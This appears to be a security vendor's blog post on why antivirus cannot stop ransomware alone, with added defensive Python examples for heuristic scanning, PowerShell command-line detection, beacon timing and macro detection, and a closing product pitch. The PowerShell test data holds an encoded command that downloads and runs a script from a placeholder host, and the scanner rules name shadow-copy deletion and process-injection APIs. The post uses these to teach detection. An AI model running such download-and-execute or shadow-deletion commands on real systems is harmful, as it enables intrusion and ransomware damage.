Antivirus software is a crucial component of any security stack. The original role of antivirus (AV) was to solely detect viruses, but antivirus coverage has expanded as security threats evolve. Modern AV software can now protect against other malware, such as keyloggers, trojan horses, rootkits, and more.
Most antivirus vendors claim that their software prevents ransomware. That’s true to a certain extent; most antivirus software can typically detect known strains of ransomware. Many antivirus products have spam filters that can prevent end users from receiving malicious emails from threat actors.
But to rely solely on antivirus as a silver bullet to prevent ransomware would be a grave mistake, just as it would be a mistake to rely on any single product. As Eva Chen, CEO of Trend Micro, said to ZDNet, “In the antivirus business, we have been lying to customers for 20 years…No one is able to detect five and a half million viruses.”
That was back in 2008 — and since then, the security threat landscape has evolved significantly.
As ransomware has become more profitable, threat actors can dedicate more resources to developing sophisticated ways to infiltrate an environment. Oftentimes these techniques are specifically designed to evade security measures such as antivirus.
To understand why antivirus software isn’t enough to prevent ransomware, let’s take a look at how antivirus works.
Antivirus software constantly scans programs and files and analyzes that data against a database of known types of malware. Generally, antivirus uses three different methods to detect viruses:
Scanning or specific detection. An antivirus scanner compares data against a list of unique signatures or characteristics that viruses typically have. This is the most common detection method; nearly every antivirus product uses it to detect malware.
However, malware developers can easily evade this technique by changing the code, encrypting it, or modifying the signature string. This method can also only match samples for which a signature already exists, which leaves out new strains of malware. Open source software and malware-creation kits let people without any coding experience easily create and customize malware.
Generic detection. To address the limitations of specific detection, generic detection looks for common features of popular malware families. Generic detections can be broad — like scanning for known exploit code — or specific; for example, scanning for specific packers that one malware strain uses.
Heuristic detection. This is a more advanced method of detection that uses suspicious behavior or file structures to detect viruses. Antivirus software developers develop a set of rules to distinguish viruses from normal behavior, and then test code segments against these rules to determine whether they are a virus.
Even advanced detection methods like heuristics aren’t 100% effective, according to Chen. Virus writers know that heuristics use rules to inspect files, so they split the malicious program into different files, then download each file to test it against the rule.
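To make the difference between the three methods concrete, here is a toy scanner written for this post (it is an added example, not Blumira's code and not how any commercial antivirus engine is implemented). It builds a "signature" from a constructed byte string standing in for a known sample, then scores files against a handful of heuristic rules. The sample, the rule weights, the 4 KiB "packer" and the entropy threshold are all assumptions chosen for illustration; the point is that a one-string edit or encrypting the body defeats the exact signature while the behavioural rules still fire.

```python
import hashlib
import math

# Constructed sample "file" (a plain byte string, not real malware). The
# strings stand in for imports and commands a scanner might find in a binary.
KNOWN_SAMPLE = (
    b"MZ\x90\x00 CreateRemoteThread WriteProcessMemory VirtualAllocEx "
    b"vssadmin Delete Shadows payload-v1"
)

# Specific detection: a full-file hash plus a byte pattern lifted from the known sample.
SIGNATURE_HASHES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}
SIGNATURE_PATTERNS = [b"payload-v1"]


def signature_scan(data: bytes) -> bool:
    """Match exact hash or any known byte pattern (the 'scanning' method)."""
    if hashlib.sha256(data).hexdigest() in SIGNATURE_HASHES:
        return True
    return any(p in data for p in SIGNATURE_PATTERNS)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; plain code/text sits around 4-6, encrypted or packed data near 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


INJECTION_APIS = (b"CreateRemoteThread", b"WriteProcessMemory", b"VirtualAllocEx")
SHADOW_COPY_STRINGS = (b"vssadmin", b"Delete Shadows")

# Heuristic detection: weighted rules over structure and content instead of exact bytes.
# Weights and the 7.0 entropy threshold are assumptions for this example.
HEURISTIC_RULES = [
    ("process-injection API set", 3,
     lambda d: all(a in d for a in INJECTION_APIS)),
    ("shadow-copy deletion strings", 2,
     lambda d: any(s in d for s in SHADOW_COPY_STRINGS)),
    ("high-entropy body (packed or encrypted)", 3,
     lambda d: len(d) >= 1024 and shannon_entropy(d[2:]) > 7.0),
]
SUSPICIOUS_SCORE = 3


def heuristic_scan(data: bytes):
    hits = [(name, weight) for name, weight, rule in HEURISTIC_RULES if rule(data)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def classify(data: bytes) -> dict:
    by_signature = signature_scan(data)
    score, reasons = heuristic_scan(data)
    return {
        "signature": by_signature,
        "heuristic_score": score,
        "reasons": reasons,
        "suspicious": by_signature or score >= SUSPICIOUS_SCORE,
    }


def keystream(seed: bytes, length: int) -> bytes:
    """Deterministic pseudo-random bytes (SHA-256 chain) used to 'pack' a sample."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:length])


def pack(data: bytes, seed: bytes = b"constructed-key") -> bytes:
    """Stand-in for a packer: pad to 4 KiB and XOR with a keystream, keep a 2-byte header."""
    body = (data * (4096 // len(data) + 1))[:4096]
    return b"MZ" + bytes(a ^ k for a, k in zip(body, keystream(seed, len(body))))


# The two evasions from the text: edit one string, or encrypt the whole body.
MODIFIED_SAMPLE = KNOWN_SAMPLE.replace(b"payload-v1", b"payload-v2")
PACKED_SAMPLE = pack(KNOWN_SAMPLE)

if __name__ == "__main__":
    for label, sample in [("known", KNOWN_SAMPLE), ("modified", MODIFIED_SAMPLE),
                          ("packed", PACKED_SAMPLE), ("benign", b"quarterly report text")]:
        print(label, classify(sample))
```

Running it shows the known sample caught by both methods, the one-byte variant caught only by the heuristic rules, and the packed variant caught only by the entropy rule. That last case is also the heuristic method's weak spot: the rule knows something is hidden but not what, which is exactly the ambiguity attackers exploit when they split or stage a payload.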
Of course cybercriminals are aware of antivirus products and understand how they work. To evade antivirus, threat actors use a variety of evasion techniques to gain access to a system and to eventually execute a ransom payload. More sophisticated attacks often include a combination of multiple techniques.
1. DLL Injection
DLL injection, or DLL hijacking, is a technique in which a threat actor gets a process to load malicious dynamic link libraries (DLLs) that look like legitimate ones; groups such as REvil have used it to launch ransomware attacks. DLL files are essential components of the Windows OS, but they can be manipulated.
For example, the banking trojan Dridex used newly created DLLs, delivered through phishing emails, to evade file signature detection by antivirus software. These DLLs were sideloaded by legitimate Windows binaries, which made them look like legitimate software.
2. Phishing
Phishing is the second most common attack vector (after RDP compromise) that ransomware actors use to launch an attack, according to Coveware.
Antivirus software can’t stop phishing attacks, especially those that use social engineering techniques to trick users into handing over sensitive information. Some antivirus products scan email, but they generally cannot detect malicious code injected in an email. That’s why end user awareness is an important component of every security strategy.
3. Fileless Malware
Many ransomware and malware attacks involve installing malicious files on a computer, but a fileless attack takes advantage of tools and applications that are already built into a system by piggybacking on legitimate scripts to run malicious activity. Fileless malware attacks are memory-based rather than file-based, making them extremely difficult to detect.
Fileless malware attacks include injecting malicious code into legitimate Microsoft Word documents, JavaScript code, or PowerShell scripts. For example, Netwalker ransomware attacks involved malware that was written in PowerShell and executed directly in memory, rather than storing the ransomware binary on disk.
Because antivirus software looks for the traditional characteristics of a malicious file, it cannot detect fileless malware: there is no file on disk to match a signature against.
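What does catch fileless PowerShell is process telemetry rather than file scanning. The example below is added for this post (it is not Blumira's detection logic) and runs a few weighted rules over constructed Sysmon-style process-creation records: it decodes a base64/UTF-16LE `-EncodedCommand` payload, looks for in-memory execution of downloaded content, hidden-window switches, and an Office parent process. The event fields, rule weights, alert threshold and the `example.invalid` host are assumptions made for the demonstration.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
# The command string is the textbook download-and-run-in-memory pattern, encoded the way
# PowerShell's -EncodedCommand expects (base64 of UTF-16LE).
STAGE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGE_CMD.encode("utf-16le")).decode()

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS_PATH,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"Image": PS_PATH,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# PowerShell accepts abbreviated switches, so match -e, -ec, -enc and the full form.
ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# (name, weight, predicate over the event and the command text with any encoded payload decoded).
# Weights and threshold are assumptions for this example.
RULES = [
    ("encoded command line", 2,
     lambda e, text: ENCODED_RE.search(e["CommandLine"]) is not None),
    ("hidden window or no profile", 1,
     lambda e, text: re.search(r"-w(?:indowstyle)?\s+hidden|-nop\b", e["CommandLine"], re.I) is not None),
    ("in-memory execution of downloaded content", 3,
     lambda e, text: re.search(r"\biex\b|invoke-expression", text, re.I) is not None
                     and "downloadstring" in text.lower()),
    ("spawned by an Office application", 2,
     lambda e, text: e["ParentImage"].lower().endswith(OFFICE_PARENTS)),
]
ALERT_THRESHOLD = 4


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script text hidden behind -EncodedCommand, or '' if none/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event: dict) -> dict:
    """Score one process-creation event; only PowerShell hosts are considered."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return {"score": 0, "reasons": [], "decoded": "", "alert": False}
    decoded = decode_encoded_command(event["CommandLine"])
    text = event["CommandLine"] + "\n" + decoded
    hits = [(name, w) for name, w, rule in RULES if rule(event, text)]
    score = sum(w for _, w in hits)
    return {"score": score, "reasons": [n for n, _ in hits],
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def triage(events) -> list:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

The scheduled backup script and the plain `cmd.exe` record score zero, while the Office-spawned, hidden, encoded launcher scores on every rule. Decoding the payload before matching matters: none of the interesting strings are visible in the raw command line, which is precisely why file-signature scanning has nothing to hook on to.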
4. Obfuscated Malware
Obfuscation techniques are meant to evade detection, and like fileless malware, they often rely on legitimate tools that are already in a system. Cobalt Strike is a classic example of this; it’s a legitimate tool that security researchers use for pentesting. Threat actors use Cobalt Strike as a backdoor or for lateral movement; in Q2 of 2020, 66% of all ransomware attacks — including the SolarWinds supply chain attack — involved Cobalt Strike payloads.
Although some Cobalt Strike payload signatures can be detected with antivirus, many Cobalt Strike attacks obfuscate the shellcode to evade detection. AV products use sandboxing — a separate environment in which executables are run and inspected — to detect malware, but staging the shellcode over a named pipe means that the sandbox won’t find it.
To detect Cobalt Strike, use Sysmon in conjunction with a security information and event management (SIEM) platform, and review DNS and proxy logs. Blumira detects when Cobalt Strike is being used in an environment.
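One thing DNS and proxy logs reveal that an endpoint scanner never sees is timing. A beacon that checks in on a fixed interval leaves a regular rhythm in the logs even when every individual request looks like ordinary web traffic. The script below is an added example (not Blumira's detection content): it groups constructed proxy log lines per client and destination, computes the gaps between requests, and flags pairs whose gaps have a very low coefficient of variation. The log format, the 8-event minimum, the 0.15 threshold and the `example.invalid` hostnames are assumptions chosen for the demonstration; real beacons add jitter, so tune the threshold against your own baseline.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log() -> list:
    """Constructed proxy log lines: '<ISO timestamp> <client_ip> <destination host> <bytes>'."""
    base = datetime(2021, 6, 1, 9, 0, 0)
    lines = []
    # Client 10.0.0.5: a check-in roughly every 60 s with a few seconds of jitter.
    t = base
    for jitter in (0, 2, -1, 3, 0, -2, 1, 2, -1, 0, 1, -2):
        t += timedelta(seconds=60 + jitter)
        lines.append(f"{t.isoformat()} 10.0.0.5 cdn-updates.example.invalid 512")
    # Client 10.0.0.7: ordinary browsing, irregular gaps.
    t = base
    for gap in (3, 40, 2, 300, 7, 120, 1, 900, 15, 60, 4, 250):
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} 10.0.0.7 news.example.invalid 20480")
    return sorted(lines)  # ISO timestamps sort chronologically as strings


def parse(lines):
    for line in lines:
        ts, src, host, size = line.split()
        yield datetime.fromisoformat(ts), src, host, int(size)


def find_beacons(lines, min_events: int = 8, max_cv: float = 0.15) -> dict:
    """Group requests per (client, host). A low coefficient of variation in the
    inter-request gaps over enough events is a beacon-like periodic pattern."""
    by_pair = defaultdict(list)
    for ts, src, host, _ in parse(lines):
        by_pair[(src, host)].append(ts)
    results = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_events:
            continue  # too few observations to call the interval regular
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        results[pair] = {"events": len(stamps), "mean_interval_s": round(mean, 1),
                         "cv": round(cv, 3), "beacon": cv <= max_cv}
    return results


if __name__ == "__main__":
    for pair, info in find_beacons(build_sample_log()).items():
        print(pair, info)
```

The same grouping works on Sysmon DNS query events (Event ID 22) or on firewall connection logs once they are in the SIEM; the only thing that changes is the parser. Pair the timing signal with the destination's reputation and age before raising it to an analyst, since software updaters and monitoring agents also poll on fixed intervals.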
5. Weaponized Documents
Cybercriminals typically use weaponized documents in tandem with a phishing campaign. For example, a user may receive an email that instructs them to click on an attachment that looks like a resume, invoice, or Excel spreadsheet. That document, however, is embedded with malicious code that threat actors can use to infiltrate a system.
The crypto-ransomware strain Locky used a malicious macro in a Word document to install an executable file on a victim’s device that encrypts the user’s documents, database, images, and other data. Another malware strain called IcedID uses rigged Excel spreadsheets as a delivery mechanism, tricking users to open them by claiming that they were sued or owe money.
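Both of those delivery mechanisms depend on a macro project inside the document, and that is something mail gateways and endpoint tooling can check for before the user ever sees the attachment. The example below is added for this post (it is not Blumira's code): modern Office files are zip containers, and the VBA project is stored as a `vbaProject.bin` part, so a plain `zipfile` scan is enough to tell a macro-bearing document from a clean one. The minimal constructed documents, the quarantine policy and the handling of legacy binary formats are assumptions; real `.doc`/`.xls` files need an OLE parser such as the open source oletools project.

```python
import io
import zipfile

# OOXML documents are zip containers; VBA macros live in a vbaProject.bin part.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls compound-file header


def build_ooxml(kind: str, with_macro: bool) -> bytes:
    """Constructed minimal stand-in for a .docx/.docm or .xlsx/.xlsm file (not a real document)."""
    folder = {"word": "word", "excel": "xl"}[kind]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(f"{folder}/document.xml", "<root/>")
        if with_macro:
            z.writestr(f"{folder}/vbaProject.bin", b"constructed VBA container")
    return buf.getvalue()


def inspect_attachment(data: bytes) -> dict:
    """Classify an attachment and report whether it carries a macro project."""
    if data.startswith(OLE_MAGIC):
        # Legacy binary Office format: macros sit inside OLE streams, which needs a
        # dedicated parser (e.g. oletools) rather than zipfile. Report 'unknown'.
        return {"format": "ole-legacy", "macros": None, "parts": []}
    if not data.startswith(b"PK"):
        return {"format": "unknown", "macros": None, "parts": []}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = set(z.namelist())
    except zipfile.BadZipFile:
        return {"format": "unknown", "macros": None, "parts": []}
    parts = [p for p in MACRO_PARTS if p in names]
    return {"format": "ooxml", "macros": bool(parts), "parts": parts}


def should_quarantine(data: bytes) -> bool:
    """Policy (an assumption for this example): hold anything with macros, and anything
    that could not be parsed, for analyst review; deliver only confirmed macro-free files."""
    return inspect_attachment(data)["macros"] is not False


if __name__ == "__main__":
    for label, blob in [("invoice.docm", build_ooxml("word", True)),
                        ("resume.docx", build_ooxml("word", False)),
                        ("statement.xlsm", build_ooxml("excel", True))]:
        verdict = "quarantine" if should_quarantine(blob) else "deliver"
        print(label, inspect_attachment(blob), verdict)
```

Note that the check keys off the container contents, not the file extension, so a macro-enabled document renamed to look harmless is still flagged. The decision to hold unparseable files rather than pass them through is the conservative default for an inbound mail path; it trades some analyst time for not letting a malformed or legacy-format lure slip past.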
Antivirus is a worthwhile investment in any security stack, but there’s no single product that will fully prevent ransomware. The best way for organizations to protect themselves is with a layered, nuanced approach to security. Investing in a next-generation firewall (NGFW), a robust antivirus product, and endpoint detection and response are important steps. But those tools are ineffective without a way to receive alerts and have visibility into an environment, which is why it’s crucial to have a centralized logging solution like Blumira.
The best way to prevent ransomware is to be familiar with the stages of a ransomware attack, and then to detect those behaviors. Blumira detects these tactics, such as reconnaissance, password spraying, privilege escalation, and more and alerts you early enough to stop an attack.
Blumira not only detects behaviors associated with ransomware, but our platform also provides automated workflows and playbooks to give you guidance on remediation steps. Our team of security experts acts as an extension of your team, ready to answer any questions about a finding or how to move forward.
Get your Blumira Free account today; deployment takes a matter of hours, and it’s easy to start getting immediate security value in your organization.